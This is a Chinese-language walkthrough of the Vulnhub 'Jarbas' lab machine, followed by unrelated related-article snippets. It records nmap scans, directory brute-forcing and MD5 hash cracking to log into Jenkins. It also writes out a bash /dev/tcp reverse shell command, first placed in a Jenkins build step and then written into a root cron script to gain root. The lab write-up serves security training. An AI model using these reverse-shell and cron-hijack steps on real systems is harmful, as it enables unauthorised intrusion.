jarbas 靶机渗透(cms 渗透)

news2024/11/13 11:31:42

靶机信息

vulnhub 靶机

主机发现

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo nmap -sn 192.168.50.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 15:45 CST
Nmap scan report for 192.168.50.1
Host is up (0.00023s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.0011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.151
Host is up (0.00011s latency).
MAC Address: 00:0C:29:15:59:02 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:FE:9D:85 (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.92 seconds
                                                                                                                                         
(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo nmap -p- --min-rate 1000 192.168.50.151 -oA ./nmapscan/port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 15:48 CST
Nmap scan report for 192.168.50.151
Host is up (0.00049s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:15:59:02 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.93 seconds

端口扫描

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.50.151           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 15:53 CST
Nmap scan report for 192.168.50.151
Host is up (0.00034s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:15:59:02 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds
                                                                

udp扫描

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo nmap -sU -p22,80,3306,8080 192.168.50.151       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 19:00 CST
Nmap scan report for 192.168.50.151
Host is up (0.00034s latency).

PORT     STATE  SERVICE
22/udp   closed ssh
80/udp   closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:15:59:02 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds


漏洞脚本扫描

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo nmap --script=vuln -p22,80,3306,8080 192.168.50.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 19:03 CST
Nmap scan report for 192.168.50.151
Host is up (0.00033s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.50.151:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.50.151:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.50.151:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.50.151
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.50.151:80/
|     Form id: wmtb
|     Form action: /web/submit
|     
|     Path: http://192.168.50.151:80/
|     Form id: 
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|     
|     Path: http://192.168.50.151:80/
|     Form id: 
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:15:59:02 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 50.94 seconds


渗透

爆破目录

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo dirb http://192.168.50.151                         

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Aug 28 19:11:14 2024
URL_BASE: http://192.168.50.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.50.151/ ----
+ http://192.168.50.151/cgi-bin/ (CODE:403|SIZE:210)                                                                                    
+ http://192.168.50.151/index.html (CODE:200|SIZE:32808)                                                                                
                                                                                                                                        
-----------------
END_TIME: Wed Aug 28 19:11:17 2024
DOWNLOADED: 4612 - FOUND: 2

爆破目录

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# sudo gobuster dir -u http://192.168.50.151 -w /usr/share/wordlists/dirbuster/directories.jbrofuzz -x php,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.50.151
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
[ERROR] parse "http://192.168.50.151/%": invalid URL escape "%"
[ERROR] parse "http://192.168.50.151/%.html": invalid URL escape "%.h"
[ERROR] parse "http://192.168.50.151/%.php": invalid URL escape "%.p"
/.html                (Status: 403) [Size: 207]
/.                    (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
/??                   (Status: 200) [Size: 32808]
/??.php               (Status: 200) [Size: 32808]
/??.html              (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/index.html           (Status: 200) [Size: 32808]
Progress: 176064 / 176067 (100.00%)
===============================================================
Finished
===============================================================
                                                                   

访问一下

http://192.168.50.151/access.html

在这里插入图片描述
看看是啥hash

(base) ┌──(root㉿kali)-[/home/kali/testJarbas]
└─# hash-identifier '5978a63b4654c73c60fa24f836386d87'
/usr/share/hash-identifier/hash-id.py:13: SyntaxWarning: invalid escape sequence '\ '
  logo='''   #########################################################################
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))


md5在线解密

tiago:5978a63b4654c73c60fa24f836386d87
5978a63b4654c73c60fa24f836386d87
italia99

trindade:f463f63616cb3f1e81ce46b39f882fd5
f463f63616cb3f1e81ce46b39f882fd5
marianna

eder:9b38e2b1e8b12f426b0d208a7ab6cb98
9b38e2b1e8b12f426b0d208a7ab6cb98
vipsu

使用
eder
vipsu
登录

在这里插入图片描述

里边逛逛

监听

(base) ┌──(root㉿kali)-[/home/kali]
└─# sudo ncat -lvnp 4444                                    
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444

创建 item 尝试弹个shell

/bin/bash -i >& /dev/tcp/192.168.50.147/4444 0>&1
在这里插入图片描述对 item 使用 build now
在这里插入图片描述


bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ifconfig
ifconfig
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ 

看看passwd

bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ 

bash-4.2$ 


看看计划任务/etc/crontab

bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ 


看看这写的是啥

bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
bash-4.2$ 

弹一个/bin/bash的shell

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.50.147/4443 0>&1" > /etc/script/CleaningScript.sh

等5分钟
在这里插入图片描述芜湖,来啦
在这里插入图片描述

看一看shell

(base) ┌──(root㉿kali)-[/home/kali]
└─# sudo ncat -lvnp 4443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 192.168.50.151:54754.
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[root@jarbas ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:15:59:02 brd ff:ff:ff:ff:ff:ff
    inet 192.168.50.151/24 brd 192.168.50.255 scope global dynamic ens33
       valid_lft 1655sec preferred_lft 1655sec
    inet6 fe80::9114:a460:aa3:9dd5/64 scope link 
       valid_lft forever preferred_lft forever
[root@jarbas ~]# 
[root@jarbas ~]# sudo -l
sudo -l
Matching Defaults entries for root on jarbas:
    !visiblepw, always_set_home, match_group_by_gid, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User root may run the following commands on jarbas:
    (ALL) ALL


找flag

[root@jarbas ~]# pwd
pwd
/root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt   
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]# 


在这里插入图片描述
拿下flag

一些小细节

关于&>和>&

>&:这个操作符是传统的BSD风格的重定向,它用于将一个文件描述符的输出重定向到另一个文件描述符。例如,2>&1表示将文件描述符2(标准错误输出)重定向到文件描述符1(标准输出)。

&>:这个操作符是GNU bash特有的语法糖,它允许你将标准输出和标准错误输出重定向到同一个位置,而不需要分别指定文件描述符。例如,&> file.txt等同于> file.txt 2>&1。

判断系统是否为debian发行版
dpkg -l
若是debian发行版,应当有内容

查看当前用户的权限
sudo -l

passwd 和 shadow
用于观察系统中存在的用户

计划任务的目录
cat /etc/crontab

总结

nmap主机发现,扫端口,漏洞脚本扫描

发现80端口部署了jakins
发现8080端口似乎是一个管理端登录窗口

爆破80端口的目录,指定后缀为html,php

找到几个账号和密码,在线md5解密,尝试登录后台

使用jakins的特性,创建 item 时可写 shell 或 batch, 配合之前的nmap扫描可知服务器为linux系统,故写入 shell 脚本

kali 监听4444 端口,build 这个 item 拿到一个 shell,这个shell为 /bash/false ,应当提权

使用简单的命令查看用户名,权限,ip, 其他系统内其他账号等

查看 /etc/cronbat 计划任务的内容, 发现其每 5 分钟使用root权限执行一个.sh脚本

查看.sh脚本的内容,为 rm -rf 一个 access.log , 是删除访问日志

将 getshell 命令追加或覆盖到这个 .sh 文件,将shell发到kali 的4443端口

whoami为root, cat /flag.txt 拿到 flag,结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2095535.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

职场真相:在草台班子中寻找自我价值

在踏入社会的那一刻起&#xff0c;我们每个人都怀揣着对未来的无限憧憬与梦想&#xff0c;渴望在职场这个广阔的舞台上绽放光彩。然而&#xff0c;现实往往比理想骨感得多&#xff0c;尤其是在初入职场的几年里&#xff0c;那些曾经以为的“精英团队”、“完美计划”逐渐被现实…

如何选到好的宠物空气净化器,用哪款宠物空气净化器比较好?

在当今社会&#xff0c;养宠物已成为许多家庭不可或缺的一部分&#xff0c;猫猫狗狗以其独特的魅力&#xff0c;悄然融入了我们的生活&#xff0c;成为了家中的一员&#xff0c;它们不仅带来了无尽的欢笑与陪伴&#xff0c;更在无形中丰富了我们的情感世界&#xff0c;让家充满…

【Python】如何使用pip,安装第三方库和生成二维码、操作Excel

文章目录 第三方库使用 pip安装第三方库 生成二维码1. 确定使用哪个库2. 查看对应文档3. 开始操作 操作 Excel1. 安装 xlrd2. 编写代码 第三方库 第三方库就是别人已经实现好了的库&#xff0c;我们可以拿过来直接使用 虽然标准库已经很强大了&#xff0c;但是终究是有限的&am…

QT线程同步

#线程同步 在前面理解了QThread两种使用方法&#xff0c;和线程机制以及退出过程后&#xff0c;需要了解线程同步的内容了&#xff0c;今天开启学习线程同步知识。 还是从大佬的文章开始。 从下面这篇文章开始学习 线程同步 线程同步有&#xff1a; QMutex&#xff08;互斥&…

【PID系列】一文理解PID原理

【PID系列目录】 [&#xff11;、一文理解PID原理] &#xff12;、PID代码设计 本文目录 1、引出2、 PID概念2.1 首先&#xff0c;什么是偏差呢&#xff1f;2.2 其次&#xff0c;什么是PID比例项&#xff1f;2.3 积分————解决稳态误差的利器2.4  微分————改善动态响应…

while (r > b[i].r) del(a[r--]); while (r < b[i].r)

论 分治 cdq | [SDOI2011] 拦截导弹 某国为了防御敌国的导弹袭击&#xff0c;发展出一种导弹拦截系统。但是这种导弹拦截系统有一个缺陷&#xff1a;虽然它的第一发炮弹能够到达任意的高度、并且能够拦截任意速度的导弹&#xff0c;但是以后每一发炮弹都不能高于前一发的高度…

利用深度学习实现验证码识别-2-使用Python导出ONNX模型并在Java中调用实现验证码识别

1. Python部分&#xff1a;导出ONNX模型 首先&#xff0c;我们需要在Python中定义并导出一个已经训练好的验证码识别模型。以下是完整的Python代码&#xff1a; import string import torch import torch.nn as nn import torch.nn.functional as FCHAR_SET string.digits# …

静态库和共享库

文章目录 库的概念函数库库函数静态库的创建与使用静态库的概念静态库的创建代码示例--静态库的创建和使用 共享库的创建和是使用共享库的概念共享库的创建共享库的使用 总结 库的概念 当进行编辑C代码的时候常常会用到printf函数&#xff0c;这个函数被声明在stdio.h头文件中…

企业内部通信软件:打造高效协同办公的IM即时通讯工具

在现代企业中&#xff0c;高效的内部通信和协同办公是保持竞争优势的重要因素。为了实现团队间的快速沟通和协作&#xff0c;许多企业采用了企业内部通信软件&#xff0c;其中包括IM即时通讯工具。本文将探讨企业内部通信软件的重要性以及如何利用IM即时通讯工具打造高效协同办…

Clickhouse 为什么这么快

Clickhouse 的缘起 Clickhouse 最初是为 Yandex.Metrica 这个世界上第二大的Web分析平台开发的&#xff0c;并且一直是这个系统的核心组件。ClickHouse在Yandex.Metrica中的主要任务是使用非聚合数据在在线模式下构建报告&#xff0c;使用374台服务器组成的集群&#xff0c;在…

服务器间进行文件传输-SFTPSCP一篇搞定

1.简单介绍一下 在一些特殊场景&#xff0c;两台服务器之间需要进行文件传输的时候&#xff0c;或许我们会想到FTP&#xff0c;这也是我们常见的实现方式&#xff0c;但是如果我们不能操作远程服务器&#xff0c;无法判断远程服务器是否安装了FTP呢&#xff0c;众所周知&#…

学习周报-2024.8.31

目录 摘要 Abstract 创新点总结 模型数学原理 实验设置 一、验证实验 二、对比实验 摘要 这周重新梳理出论文的三个创新点&#xff0c;对所提出方法进行数学原理验证&#xff0c;证明其可行性。重新设置了实验部分&#xff0c;分为验证实验和对比实验&#xff0c;一共四…

使用 Eigen 库中的 Kronecker 积运算

前言 在数值计算和线性代数的众多应用中&#xff0c;Kronecker 积&#xff08;Kronecker Product&#xff09;是一种常用的矩阵运算。Eigen 是一个高性能的 C 数值计算库&#xff0c;广泛用于科学计算和工程应用中。在 Eigen 库中&#xff0c;Kronecker 积运算属于不常用的扩展…

资料分析(1)

1)截三个数去做&#xff0c;属于马上进位了&#xff0c;差距小&#xff0c;1/19<10% 2)截两位数去做&#xff0c;1/18>10% 3)次位差分别是:3&#xff0c;4&#xff0c;1&#xff0c;选项差距分别是大&#xff0c;大&#xff0c;小 截尾不需要考虑数量级 算一半&#xff0…

抽奖项目技术亮点

活动是通过秒杀领取的。&#xff08;即&#xff1a;活动对应着某一商品&#xff09; 这里超卖指&#xff1a;对于一个活动它的参与量有数量限制&#xff0c;就是活动的库存&#xff0c;当活动的领取数大于活动库存总量&#xff0c;就是超卖 用户秒杀参与活动的资格&#xff08;…

一.海量数据实时分析-Doris入门和安装

前言 停了一个月又开始写文章啦&#xff0c;因为公司数据量达到了几十亿&#xff0c;老板需要做实时数据分析&#xff0c;报表看板。这么大的数据量比较好的选择是使用Doris来做&#xff0c;他可以脱离hadoop生态独立使用所以大受企业喜爱&#xff0c;也因为如此就有了这个系列…

【JavaWeb】Http请求与响应

文章目录 Http 请求与响应一、Http 请求格式1、请求行2、请求头3、请求体&#xff08;post请求才有&#xff09; 二、HttpServletRequest1、获取 请求行 信息2、获取 请求头 信息3、获取 请求参数 信息 三、Http 响应格式1、响应行2、响应头3、响应体&#xff08;正文&#xff…

AI大模型应用开发环境配置

目录 一、工具下载 1、Python官网下载 2、Pycharm官网下载 3、Streamlit官网下载 二、升级PIP &#xff08;一&#xff09;检查PIP版本 &#xff08;二&#xff09;在anaconda Prompt命令窗口输入 三、安装openai组件 四、安装streamlit组件 五、启动streamlit 一、工…

Voi滑板车公司助农扶商,着手打造流量板块

Voi滑板车公司助农扶商&#xff0c;着手打造流量板块。 吉林是粮食大省&#xff0c;是全国优质粳稻主产区&#xff0c;现阶段全省水稻年产量600多万吨&#xff08;商品量400万吨左右&#xff09;&#xff0c;占东北三省一区的24%。巍巍长白山、悠悠松江水&#xff0c;辽阔黑土…

Qt:玩转QPainter序列九(文本,文本框,填充)

前言 继续承接序列八 正文 1. drawImage系列函数 绘制图像 inline void drawImage(const QPoint &p, const QImage &image); 作用: 在指定的点 p 上绘制 QImage 图像。图像的左上角将对齐到 p 点。 inline void drawImage(int x, int y, const QImage &image,…